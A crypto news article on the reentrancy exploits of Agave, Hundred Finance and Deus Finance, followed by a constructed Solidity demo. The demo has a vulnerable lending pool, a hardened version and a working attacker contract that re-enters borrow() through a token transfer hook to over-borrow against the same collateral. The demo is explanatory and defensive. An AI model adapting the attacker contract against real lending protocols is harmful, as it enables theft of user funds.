Agave and Hundred Finance Exploited as Crypto Crimes Skyrocket
DeFi exploits have exploded this week, with several protocols falling into the crosshairs of bad actors. In the latest attack, Agave and Hundred Finance were exploited on the Gnosis chain this past Tuesday, resulting in losses amounting to $11 million worth of crypto.
Breakdown of the Attack
The attackers exploited a reentrancy bug present in both protocols, funding the attack with flash loans. They made off with millions in USD Coin (USDC), wrapped ETH (WETH), Gnosis (GNO), wrapped BTC (WBTC), Chainlink (LINK) and wrapped XDAI. The reentrancy vulnerability let them drain the two lending pools: in the middle of a borrow, the protocol made an external call to an untrusted contract controlled by the attackers before its own state reflected the new debt, and from inside that call the attackers' contract called back into the protocol and borrowed again against the same collateral. Repeating this cycle let them keep borrowing without posting any additional collateral. They have since sent over 2,100 ETH to a crypto mixer in an attempt to launder the drained funds. Following the breaches, the Agave token (AGVE) and Hundred Finance token (HND) fell 20% and 3.5%, respectively. Both protocols have paused operations while their developers investigate.
DeFi Reentrancy Attacks Make a Comeback
The exploits of Agave and Hundred Finance came just 24 hours after attackers stole $3 million worth of crypto from the DeFi protocol Deus Finance. As in Tuesday's twin attacks, the Deus Finance attackers used a reentrancy bug to borrow repeatedly against the same collateral. In the wake of three attacks on prominent DeFi protocols in one week, industry security experts are voicing concern over developers' failure to eradicate a well-known class of vulnerability. According to Gleb Zykov, Co-Founder and CTO of DeFi security and analytics company HashEx, project teams could do more to prevent reentrancy attacks by using static analysis tools that pinpoint weak spots in DeFi codebases. Agave is a fork of the lending platform Aave, and Hundred Finance is a fork of Compound. Zykov traces the reentrancy exposure in both sets of contracts to a project fork problem. Blockchain security researcher Mudit Gupta struck a similar note, arguing that the underlying cause of the recurring hacks is that the bridged tokens on the Gnosis network are non-standard: they call back into the recipient contract during a transfer, which hands an attacker execution in the middle of a lending operation. In a recent tweet, Gupta argued that while the parent protocols take care that their lending procedures cannot be re-entered, following the recommended checks-effects-interactions pattern and vetting the tokens they list, the forked projects did not.
“The agave and hundred protocol teams messed up by listing a token that can reenter. Aave and compound governance actively check for reentrancy before listing tokens on the mainnet to avoid similar attacks,” Gupta noted.
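The mechanism described above, as an added example that is not code from Agave, Hundred Finance, Aave, Compound or the Gnosis bridge: a constructed callback-style token whose transfer hands control to a contract recipient, a lending pool that makes that external call before recording the new debt, the same pool with checks-effects-interactions ordering and a reentrancy guard, and an attacker contract that re-enters borrow() from the hook. The contract names, the hook name onTokenTransfer, the 50% borrow limit and the amounts are assumptions made for this demo.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Recipient hook that a callback-style token invokes during transfer. Assumed for this
// example and named after the ERC-677 family's hook; not taken from either protocol's code.
interface ITokenRecipient {
    function onTokenTransfer(address from, uint256 amount, bytes calldata data) external;
}

// Constructed demo token: ERC-20 style balances plus a post-transfer callback to contract
// recipients. Open mint() and no allowance check, to keep the demo short.
contract CallbackToken {
    mapping(address => uint256) public balanceOf;
    function mint(address to, uint256 amount) external { balanceOf[to] += amount; }
    function transfer(address to, uint256 amount) external returns (bool) {
        _move(msg.sender, to, amount);
        return true;
    }
    function transferFrom(address from, address to, uint256 amount) external returns (bool) {
        _move(from, to, amount); // allowance check omitted: demo only
        return true;
    }
    function _move(address from, address to, uint256 amount) internal {
        require(balanceOf[from] >= amount, "balance");
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
        if (to.code.length > 0) {
            // Control leaves the token here: the recipient runs arbitrary code before
            // the caller's transfer() returns. A failing hook is ignored, so contracts
            // without the hook (such as the pools below) can still receive the token.
            (bool ok, ) = to.call(
                abi.encodeWithSelector(ITokenRecipient.onTokenTransfer.selector, from, amount, bytes(""))
            );
            if (!ok) { /* hook failure swallowed */ }
        }
    }
}

// Shared bookkeeping: one asset serves as both collateral and the borrowed asset, and a
// borrower's debt may reach half of their collateral.
abstract contract PoolBase {
    CallbackToken public immutable token;
    mapping(address => uint256) public collateral;
    mapping(address => uint256) public borrows;
    constructor(CallbackToken t) { token = t; }
    function deposit(uint256 amount) external {
        collateral[msg.sender] += amount;
        require(token.transferFrom(msg.sender, address(this), amount), "transferFrom");
    }
    function _checkBorrow(uint256 amount) internal view {
        require(borrows[msg.sender] + amount <= collateral[msg.sender] / 2, "undercollateralised");
    }
    function borrow(uint256 amount) external virtual;
}

// Check, interact, then write: while the hook runs, borrows[msg.sender] is still stale, so a
// nested borrow() passes the same check against the same collateral.
contract VulnerablePool is PoolBase {
    constructor(CallbackToken t) PoolBase(t) {}
    function borrow(uint256 amount) external override {
        _checkBorrow(amount);
        require(token.transfer(msg.sender, amount), "transfer");
        borrows[msg.sender] += amount; // recorded only after the hook has already run
    }
}

// Checks-effects-interactions plus a mutex: debt is recorded before the asset leaves the
// pool, and a nested call is rejected before it can read any state.
contract HardenedPool is PoolBase {
    uint256 private locked = 1;
    modifier nonReentrant() { require(locked == 1, "reentrant"); locked = 2; _; locked = 1; }
    constructor(CallbackToken t) PoolBase(t) {}
    function borrow(uint256 amount) external override nonReentrant {
        _checkBorrow(amount);
        borrows[msg.sender] += amount;
        require(token.transfer(msg.sender, amount), "transfer");
    }
}

// Attacker: deposits once, borrows the maximum once, then re-enters borrow() from the
// token hook ROUNDS more times against the same collateral.
contract Reenterer is ITokenRecipient {
    PoolBase public immutable pool;
    CallbackToken public immutable token;
    uint256 public constant ROUNDS = 3;
    uint256 private depth;
    constructor(PoolBase p) { pool = p; token = p.token(); }
    function attack(uint256 depositAmount) external {
        pool.deposit(depositAmount);
        pool.borrow(depositAmount / 2); // the only borrow this collateral supports
    }
    function onTokenTransfer(address, uint256 amount, bytes calldata) external override {
        if (msg.sender == address(token) && depth < ROUNDS) {
            depth++;
            pool.borrow(amount); // VulnerablePool: passes again; HardenedPool: reverts
        }
    }
}
```

To walk it through: deploy CallbackToken, deploy VulnerablePool(token), mint 1000 to the pool and 100 to a fresh Reenterer(pool), then call attack(100). The outer borrow(50) passes its collateral check, and each of the three nested borrows from the hook passes the identical check because borrows[attacker] is still 0 until the calls unwind; the attacker ends up holding 200 tokens against 100 of collateral, with borrows(attacker) recorded as 200 only afterwards. Repeating with HardenedPool yields a single borrow of 50: the nested call hits the nonReentrant guard and reverts, and even without the guard the earlier debt write would make the check fail. The listing-time review that Gupta describes amounts to asking one question of an asset before a lending pool accepts it: does anything on its transfer path call out to the recipient, as _move does here?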